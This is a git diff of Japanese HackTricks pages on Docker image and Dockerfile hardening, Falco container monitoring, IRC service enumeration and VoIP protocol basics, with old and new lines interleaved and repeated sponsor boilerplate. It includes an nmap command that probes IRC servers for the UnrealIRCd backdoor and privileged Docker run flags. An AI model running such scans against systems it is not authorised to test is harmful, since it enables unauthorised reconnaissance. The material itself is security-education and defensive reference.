* `docker run --rm -it --pid host r.j3ss.co/amicontained`
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
### Dockerイメージのセキュリティ強化
#### Dockerイメージのセキュリティ強化
* 他のDockerイメージをスキャンして脆弱性を見つけるために[https://github.com/quay/clair](https://github.com/quay/clair)のDockerイメージを使用できます。
* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
### Dockerfileのセキュリティ強化
#### Dockerfileのセキュリティ強化
* Dockerfileを検査し、さまざまなミス構成を見つけるために[https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter)ツールを使用できます。各ミス構成にはIDが割り当てられ、[https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md)でそれぞれの修正方法を見つけることができます。
* `dockerfilelinter -f Dockerfile`
![](<../.gitbook/assets/image (418).png>)
![](<../.gitbook/assets/image (173).png>)
* Dockerfileを検査し、さまざまなミス構成を見つけるために[https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint)ツールを使用できます。
* `dockerfilelint Dockerfile`
![](<../.gitbook/assets/image (419).png>)
![](<../.gitbook/assets/image (209).png>)
* Dockerfileを検査し、さまざまなミス構成を見つけるために[https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint)ツールを使用できます。
* `dockerlint Dockerfile`
![](<../.gitbook/assets/image (420).png>)
![](<../.gitbook/assets/image (68).png>)
* Dockerfileを検査し、さまざまなミス構成を見つけるために[https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint)ツールを使用できます。
* `hadolint Dockerfile`
![](<../.gitbook/assets/image (421).png>)
![](<../.gitbook/assets/image (498).png>)
### 疑わしいアクティビティのログ記録
#### 疑わしい活動のログ記録
* 実行中のコンテナで疑わしい動作を検出するために[https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco)ツールを使用できます。
* 次のチャンクで**Falcoがカーネルモジュールをコンパイルして挿入**する方法に注目してください。その後、ルールを読み込み、**疑わしいアクティビティを記録**を開始します。この場合、特権コンテナが2つ開始され、そのうち1つが機密マウントを持っていることが検出され、数秒後にコンテナ内でシェルが開かれたことが検出されました。
* 次のチャンクでは、**Falcoがカーネルモジュールをコンパイルして挿入**する方法が示されています。その後、ルールを読み込み、**疑わしい活動を記録**を開始します。この場合、特権コンテナが2つ開始され、そのうち1つが機密マウントを持っていることが検出され、数秒後にコンテナ内でシェルが開かれたことが検出されました。
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -314,24 +328,39 @@ falco-probe found and loaded in dkms
2021-01-04T12:03:24.664354000+0000: Notice Privileged container started (user=root command=container:4443a8daceb8 focused_brahmagupta (id=4443a8daceb8) image=falco:latest)
2021-01-04T12:04:56.270553320+0000: Notice A shell was spawned in a container with an attached terminal (user=root xenodochial_kepler (id=4822e8378c00) shell=bash parent=runc cmdline=bash terminal=34816 container_id=4822e8378c00 image=ubuntu)
```
### Dockerの監視
#### Dockerの監視
auditdを使用してDockerを監視できます。
Dockerを監視するためにauditdを使用できます。
### 参考文献
## 参考文献
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使用して、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
* **HackTricks**https://github.com/carlospolop/hacktricksおよび**HackTricks Cloud**https://github.com/carlospolop/hacktricks-cloudのGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

53
network-services-pentesting/pentesting-irc.md
View file

@ -8,19 +8,33 @@ HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
* **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
IRCは、最初は**プレーンテキストプロトコル**で、IANAによって**194/TCP**に割り当てられましたが、**root権限**が必要ないように**6667/TCP**や類似のポートで一般的に実行されています。
IRCは、元々**プレーンテキストプロトコル**で、IANAによって**194/TCP**に割り当てられましたが、**root権限**が不要なように**6667/TCP**や類似のポートで一般的に実行されています。
サーバーに接続するには**ニックネーム**だけが必要です。接続後、サーバーはユーザーのIPに逆DNSルックアップを実行します。
ユーザーは**オペレーター**と**通常のユーザー**に分かれます。オペレーターはより多くのアクセス権を得るために**ユーザー名**と**パスワード**が必要で、管理者がトップにいます。
ユーザーは**オペレーター**と**通常のユーザー**に分かれています。オペレーターはより多くのアクセス権を得るために**ユーザー名**と**パスワード**が必要で、管理者がトップにいます。
**デフォルトポート:** 194, 6667, 6660-7000
```
@ -81,4 +95,31 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
### Shodan
* `ホスト名を検索しています`
* `ホスト名を検索中`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗まれたマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで会社を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

100
network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
View file

@ -2,17 +2,32 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じてゼロからヒーローまでAWSハッキングを学</summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じてゼロからヒーローまでAWSハッキングを学びましょう</summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- 💬 **Discordグループ**に**参加**するhttps://discord.gg/hRep4RUj7fまたは[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する:[**@carlospolopm**](https://twitter.com/hacktricks_live)。
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## シグナリングプロトコル
### SIPSession Initiation Protocol
@ -25,64 +40,81 @@ HackTricksをサポートする他の方法
### MGCPMedia Gateway Control Protocol
MGCPMedia Gateway Control Protocolは、RFC 3435で概説された**シグナリング**および**コール** **コントロールプロトコル**です。これは、次の3つの主要コンポーネントで構成される中央集権型アーキテクチャで動作します
MGCPMedia Gateway Control Protocolは、RFC 3435で概説された**シグナリング**および**コール** **コントロールプロトコル**です。これは、3つの主要コンポーネントで構成される中央集権型アーキテクチャで動作します
1. **コールエージェントまたはメディアゲートウェイコントローラMGC**MGCPアーキテクチャのマスターゲートウェイは、**メディアゲートウェイの管理と制御**を担当します。通話の設定、変更、終了プロセスを処理します。 MGCはMGCPプロトコルを使用してメディアゲートウェイと通信します。
2. **メディアゲートウェイMGまたはスレーブゲートウェイ**:これらのデバイスは、異なるネットワーク間でデジタルメディアストリームを変換します。例従来の回線交換電話網とパケット交換IPネットワーク。これらはMGCによって管理され、それから受け取ったコマンドを実行します。メディアゲートウェイには、トランスコーディング、パケット化、エコーキャンセルなどの機能が含まれる場合があります。
3. **シグナリングゲートウェイSG**:これらのゲートウェイは、異なるネットワーク間でのシグナリングメッセージの変換を担当し、従来の電話システムSS7とIPベースのネットワークSIPまたはH.323)間シームレスな通信を可能にします。シグナリングゲートウェイは相互運用性を確保し、異なるネットワーク間で通話制御情報が適切に伝達されることを確認するために重要です。
1. **コールエージェントまたはメディアゲートウェイコントローラMGC**MGCPアーキテクチャのマスターゲートウェイは、**メディアゲートウェイの管理と制御**を担当します。通話のセットアップ、変更、終了プロセスを処理します。MGCはMGCPプロトコルを使用してメディアゲートウェイと通信します。
2. **メディアゲートウェイMGまたはスレーブゲートウェイ**:これらのデバイスは、異なるネットワーク間でデジタルメディアストリームを変換します。例えば、従来の回線交換電話網とパケット交換IPネットワークです。これらはMGCによって管理され、それから受け取ったコマンドを実行します。メディアゲートウェイには、トランスコーディング、パケット化、エコーキャンセルなどの機能が含まれる場合があります。
3. **シグナリングゲートウェイSG**:これらのゲートウェイは、異なるネットワーク間でシグナリングメッセージを変換し、従来の電話システムSS7とIPベースのネットワークSIPまたはH.323)間シームレスな通信を可能にします。シグナリングゲートウェイは相互運用性を確保し、異なるネットワーク間で通話制御情報が適切に伝達されることを確認するために重要です。
要するに、MGCPは通話制御ロジックをコールエージェントに集約し、メディアおよびシグナリングゲートウェイの管理を簡素化し、通信ネットワークでのスケーラビリティ、信頼性、効率性を向上させます。
### SCCPSkinny Client Control Protocol
Skinny Client Control ProtocolSCCPは、Cisco Systemsが所有する**プロプライエタリなシグナリングおよびコールコントロールプロトコル**です。主に**Cisco Unified Communications Manager**以前はCallManagerとして知られていましたとCisco IP電話や他のCisco音声およびビデオエンドポイント間の通信に使用されます。
Skinny Client Control ProtocolSCCPは、Cisco Systemsが所有する**プロプライエタリなシグナリングおよびコールコントロールプロトコル**です。これは主に**Cisco Unified Communications Manager**以前はCallManagerとして知られていましたとCisco IP電話や他のCisco音声およびビデオエンドポイント間の通信に使用されます。
SCCPは、通話制御サーバーとエンドポイントデバイス間の通信を簡素化する軽量プロトコルです。その最小限の設計と他のVoIPプロトコルH.323やSIPなどと比較して帯域幅要件が少ないことから、「Skinny」と呼ばれています。
SCCPは、通話制御サーバーとエンドポイントデバイス間の通信を簡素化する軽量プロトコルです。その名前が「Skinny」であるのは、そのミニマリスティックなデザインと、他のVoIPプロトコルH.323やSIPなどと比較して帯域幅要件が少ないためです。
SCCPベースのシステムの主要コンポーネントは次のとおりです
SCCPベースのシステムの主要コンポーネントは次のとおりです:
1. **コールコントロールサーバー**通常はCisco Unified Communications Managerで、通話の設定、変更、終了プロセス、通話転送、通話転送、通話保留などの他の電話機能を管理します。
1. **コールコントロールサーバー**通常はCisco Unified Communications Managerで、通話のセットアップ、変更、終了プロセス、通話転送、通話保留などの他の電話機能を管理します。
2. **SCCPエンドポイント**これらは、SCCPを使用して通話制御サーバーと通信するIP電話、ビデオ会議ユニット、または他のCisco音声およびビデオエンドポイントなどのデバイスです。これらはサーバーに登録し、シグナリングメッセージを送受信し、通話処理のためにコールコントロールサーバーからの指示に従います。
3. **ゲートウェイ**これらのデバイスは、従来の回線交換電話網とパケット交換IPネットワーク間でメディアストリームを変換する責任があります。トランスコーディングやエコーキャンセルなどの追加機能も含まれる場合があります。
SCCPは、Ciscoコールコントロールサーバーとエンドポイントデバイス間の簡単で効率的な通信方法を提供します。ただし、**SCCPはプロプライエタリプロトコル**であるため、非Ciscoシステムとの相互運用性が制限される可能性があります。そのような場合は、SIPなどの他の標準VoIPプロトコルがより適している場合があります。
SCCPは、Ciscoコールコントロールサーバーとエンドポイントデバイス間の簡単で効率的な通信方法を提供します。ただし、SCCPは**プロプライエタリプロトコル**であるため、非Ciscoシステムとの相互運用性が制限される可能性があります。そのような場合は、SIPなどの他の標準VoIPプロトコルの方が適している場合があります。
### H.323
H.323は、IPベースのネットワークなどのパケット交換ネットワーク上での音声、ビデオ、データ会議を含むマルチメディア通信のための**プロトコルスイート**です。国際電気通信連合ITU-Tによって開発され、マルチメディア通信セッションを管理する包括的なフレームワークを提供します。
H.323は、IPベースのネットワークなどのパケット交換ネットワークを介した音声、ビデオ、データ会議を含むマルチメディア通信のための**プロトコルスイート**です。国際電気通信連合ITU-Tによって開発され、マルチメディア通信セッションを管理する包括的なフレームワークを提供します。
H.323スイートの主要コンポーネントには次のものがあります:
H.323スイートの主要コンポーネントには次のものがあります:
1. **端末**IP電話、ビデオ会議システム、またはソフトウェアアプリケーションなどのエンドポイントデバイスで、H.323をサポートし、マルチメディア通信セッションに参加できす。
1. **端末**IP電話、ビデオ会議システム、ソフトウェアアプリケーションなど、H.323をサポートし、マルチメディア通信セッションに参加できるエンドポイントデバイスです。
2. **ゲートウェイ**これらのデバイスは、従来の回線交換電話網とパケット交換IPネットワーク間でメディアストリームを変換し、H.323と他の通信システムとの間で相互運用性を実現します。トランスコーディングやエコーキャンセルなどの追加機能も含まれる場合があります。
3. **ゲートキーパー**これらはH.323ネットワークで通話制御および管理サービスを提供するオプションのコンポーネントです。アドレス変換、帯域幅管理、アドミッション制御などの機能を実行し、ネットワークリソースを管理および最適化するのに役立ちます。
4. **マルチポイントコントロールユニットMCU**これらのデバイスは、複数のエンドポイントからのメディアストリームを管理およびミックスすることでマルチポイント会議を容易にします。MCUにより、ビデオレイアウト制御、音声アクティブスイッチング、連続プレゼンスなどの機能が可能になり、複数の参加者を持つ大規模な会議を開催できます。
3. **ゲートキーパー**これらはH.323ネットワークで通話制御および管理サービスを提供するオプションのコンポーネントです。アドレス変換、帯域幅管理、アドミッション制御などの機能を実行し、ネットワークリソースを管理および最適化するのに役立ちます。
4. **マルチポイントコントロールユニットMCU**:これらのデバイスは、複数のエンドポイントからのメディアストリームを管理およびミックスすることでマルチポイント会議を容易にします。MCU、ビデオレイアウト制御、音声アクティブスイッチング、連続プレゼンスなどの機能を可能にし、複数の参加者を持つ大規模な会議を開催できるようにします。
H.323は、音声およびビデオコーデックを含むさまざまなオーディオおよびビデオコーデックをサポートし、転送、転送、保留、待機などのその他の補助サービスを提供します。VoIPの初期に広く採用されましたが、より現代的で柔軟なプロトコルである**Session Initiation ProtocolSIP**などに徐々に置き換えられています。ただし、H.323は多くのレガシーシステムで使用され続けており、さまざまな機器ベンダーによってサポートされ続けています。
H.323は、音声およびビデオコーデック、通話転送、通話転送、通話保留、通話待ちなどの他の補助サービスをサポートしています。VoIPの初期に広く採用されていましたが、H.323はより現代的で柔軟なプロトコルである**Session Initiation Protocol (SIP)**に徐々に置き換えられており、より良い相互運用性と簡単な実装を提供しています。ただし、H.323は多くのレガシーシステムで使用され続けており、さまざまな機器ベンダーによってサポートされています。
### IAXInter Asterisk eXchange
IAXInter-Asterisk eXchangeは、Asterisk PBXプライベートブランチ交換サーバーと他のVoIPデバイス間の通信に主に使用される**シグナリングおよびコールコントロールプロトコル**です。AsteriskオープンソースPBXソフトウェアの作成者であるMark Spencerによって、SIPやH.323などの他のVoIPプロトコルの代替手段として開発されました。
IAXInter-Asterisk eXchangeは、Asterisk PBXプライベートブランチ交換サーバーと他のVoIPデバイス間の通信に主に使用される**シグナリングおよびコールコントロールプロトコル**です。AsteriskオープンソースPBXソフトウェアの作成者であるMark Spencerによって、SIPやH.323などの他のVoIPプロトコルに代わるものとして開発されました。
IAXは、その**単純さ**、**効率性**、および**実装の容易さ**で知られています。IAXの主な特徴には次のものがあります
IAXは**シンプルさ、効率性、実装の容易さ**で知られています。IAXの主な特徴には次のものがあります
1. **単一のUDPポート**IAXは、シグナリングおよびメディアトラフィックの両方に単一のUDPポート4569を使用するため、ファイアウォールとNATトラバーサルを簡素化し、さまざまなネットワーク環境での展開を容易にします。
1. **単一のUDPポート**IAXは、シグナリングメディアトラフィックの両方に単一のUDPポート4569を使用するため、ファイアウォールとNATトラバーサルを簡素化し、さまざまなネットワーク環境での展開を容易にします。
2. **バイナリプロトコル**SIPなどのテキストベースのプロトコルとは異なり、IAXはバイナリプロトコルであり、帯域幅の消費を削減し、シグナリングおよびメディアデータの送信により効率的にします。
3. **トランキング**IAXはトランキングをサポートし、複数の通話を単一のネットワーク接続に組み合わせることでオーバーヘッドを削減し、帯域幅の利用を向上させます。
4. **ネイティブ暗号化**IAXは、RSAなどの暗号化のための鍵交換とAESなどのメディア暗号化のための暗号化を使用して、エンドポイント間のセキュアな通信を提供するための組み込みサポートを提供します。
5. **ピアツーピア通信**IAXは、中央サーバーを必要とせずにエンドポイント間の直接通信に使用でき、よりシンプルで効率的な通話ルーティングを実現します。
3. **トランキング**IAXはトランキングをサポートし、複数の通話を単一のネットワーク接続に組み合わせることでオーバーヘッドを削減し、帯域幅の利用を向上させます。
4. **ネイティブ暗号化**IAXには、RSAなどの鍵交換およびAESなどのメディア暗号化に使用される暗号化の組み込みサポートがあり、エンドポイント間の安全な通信を提供します。
5. **ピアツーピア通信**IAXは、中央サーバーなしでエンドポイント間の直接通信に使用でき、よりシンプルで効率的な通話ルーティングを実現します。
IAXには、Asteriskエコシステムに主眼を置いていることや、SIPなどのより確立されたプロトコルと比較して普及が少ないという制限があります。その結果、IAXは非Asteriskシステムやデバイスとの相互運用性にとって最適な選択肢ではないかもしれません。ただし、Asterisk環境内で作業している場合、IAXはVoIP通信のための堅牢で効率的なソリューションを提供します。
## 伝送および輸送プロトコル
利点がある一方で、IAXにはAsteriskエコシステムへの主な焦点や、SIPなどのより確立されたプロトコルと比較しての普及度の低さなどの制限があります。その結果、IAXは非Asteriskシステムやデバイスとの相互運用性にとって最適な選択肢ではないかもしれません。ただし、Asterisk環境内で作業している場合、IAXはVoIP通信のための堅牢で効率的なソリューションを提供します。
## 伝送と輸送プロトコル
### SDPSession Description Protocol
SDPSession Description Protocolは、IPネットワーク上での音声、ビデオ、またはデータ会議などのマルチメディアセッションの特性を記述するために使用される**テキストベースの形式**です。これは**Internet Engineering Task ForceIETF**によって開発され、**RFC 4566**で定義されています。SDPは実際のメディア伝送やセッション確立を処理しませんが、**SIPSession Initiation Protocol**などの他のシグナリングプロトコルと組み合わせて使用され、メディアストリームとその属性に関する情報を交渉および交換するために使用されます。
SDPSession Description Protocolは、IPネットワーク上での音声、ビデオ、またはデータ会議などのマルチメディアセッションの特性を記述するために使用される**テキストベースの形式**です。**インターネットエンジニアリングタスクフォースIETF**によって開発され、**RFC 4566**で定義されています。SDPは実際のメディア伝送やセッション確立を処理しませんが、**SIPSession Initiation Protocol**などの他のシグナリングプロトコルと共に使用され、メディアストリームとその属性に関する情報を交渉および交換するために使用されます。
SDPの主要な要素には次のものがあります
1. **セッション情報**SDPは、セッション名、セッション説明、開始時間、終了時間など、マルチメディアセッションの詳細を記述します。
2. **メディアストリーム**SDPは、メディアタイプオーディオ、ビデオ、またはテキスト、トランスポートプロトコルRTPまたはSRTP、およびメディアフォーマットコーデック情報など、メディアストリームの特性を定義します。
3. **接続情報**SDPは、メディアを送信または受信するネットワークアドレスIPアドレスおよびポート番号に関する情報を提供します。
4. **属性**SDPは、セ
1. **セッション情報**SDPは、セッション名、セッションの説明、開始時間、終了時間など、マルチメディアセッションの詳細を記述します。
2. **メディアストリーム**SDPは、メディアタイプオーディオ、ビデオ、またはテキスト、輸送プロトコルRTPまたはSRTP、およびメディアフォーマットコーデック情報などなど、メディアストリームの特性を定義します。
3. **接続情報**SDPは、メディアを送信または受信するためのネットワークアドレスIPアドレスとポート番号に関する情報を提供します。
4. **属性**SDPは、セッションやメディアストリームに関する追加のオプション情報を提供するために属性の使用をサポートします。属性は、暗号化キー、帯域幅要件、またはメディア制御メカニズムなど、さまざまな機能を指定するために使用できます。
SDPは通常、次のプロセスで使用されます
1. 開始する側が、提案されたマルチメディアセッションのSDP説明を作成します。これには、メディアストリームとその属性の詳細が含まれます。
2. SDP説明が受信側に送信され、通常はSIPやRTSPなどのシグナリングプロトコルメッセージに埋め込まれます。
3. 受信側はSDP説明を処理し、その機能に基づいて、提案されたセッションを受け入れたり、拒否したり、変更したりすることがあります。
4. 最終的なSDP説明が、シグナリングプロトコルメッセージの一部として開始する側に送信され、交渉プロセスが完了します。
SDPのシンプルさと柔軟性により、さまざまな通信システムでマルチメディアセッションを記述するための広く採用された標準となっており、IPネットワーク上でのリアルタイムマルチメディアセッションの確立と管理において重要な役割を果たしています。
### RTP / RTCP / SRTP / ZRTP
1. **RTPReal-time Transport Protocol**RTPは、オーディオやビデオデータなどのリアルタイムメディアをIPネットワーク上で配信するために設計されたネットワークプロトコルです。**IETF**によって開発され、**RFC 3550**で定義されています。RTPは、**シンクロナイゼーション**、**シーケンス化**、および**タイムスタンプ**のメカニズムを提供し、メディアストリームのスムーズでタイムリーな再生を確保します。
2. **RTCPReal-time Transport Control Protocol**RTCPは、RTPの補助プロトコルであり、メディアストリームの品質監視を行い、その伝送に関するフィードバックを提供するために使用されます。RTPと同じ**RFC 3550**で定義されており、RTCPは**RTPセッションの参加者間で定期的に制御パケットを交換**します。パケット損失、ジッター、ラウンドトリップタイムなどの情報を共有し、ネットワークの状況を診断し適応することで、全体的なメディア品質を向上させます。
3. **SRTPSecure Real-time Transport Protocol**SRTPは、メディアストリームの**暗号化**、**メッセージ認証**、および**リプレイ保護**を提供するRTPの拡張機能であり、機密性の高いオーディオやビデオデータの安全な伝送を確保します。**RFC 3711**で定義されており、SRTPは暗号化にAESなどの暗号アルゴリズム、メッセージ認証にHMAC-SHA1などの暗号アルゴリズムを使用します。SRTPは、多くの場合、SIP over TLSなどのセキュアなシグナリングプロトコルと組み合わせて使用され、マルチメディア通信におけるエンドツーエンドのセキュリティを提供します。
4. **ZRTPZimmermann Real-time Transport Protocol**ZRTPは、RTPメディアストリームの**エンドツーエンドの暗号化**を提供する暗号鍵合意プロトコルです。PGPの作成者であるPhil Zimmermannによって開発され、**RFC 6189**で説明されています。シグナリングプロトコルに依存するSRTPとは異なり、ZRTPはシグナリングプロトコルとは独立して動作するように設計されています。通信する各当事者の間で共有秘密を確立するために**Diffie-Hellman鍵交換**を使用し、事前の信頼や公開鍵インフラストラクチャPKIを必要とせずに動作します。ZRTPには、**中間者攻撃に対する保護**として**Short Authentication StringsSAS**などの機能も含まれています。
これらのプロトコルは、IPネットワーク上での**リアルタイムマルチメディア通信の提供と保護**において重要な役割を果たします。RTPとRTCPは実際のメディア伝送と品質監視を担当し、SRTPとZRTPは、伝送されるメディアが盗聴、改ざん、およびリプレイ攻撃から保護されることを確保します。

118
network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
View file

@ -2,23 +2,37 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**ゼロからヒーローまでAWSハッキングを学ぶ** <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい場合** は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** をフォローする。**
* **ハッキングトリックを共有するためにPRを送信して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに貢献する。
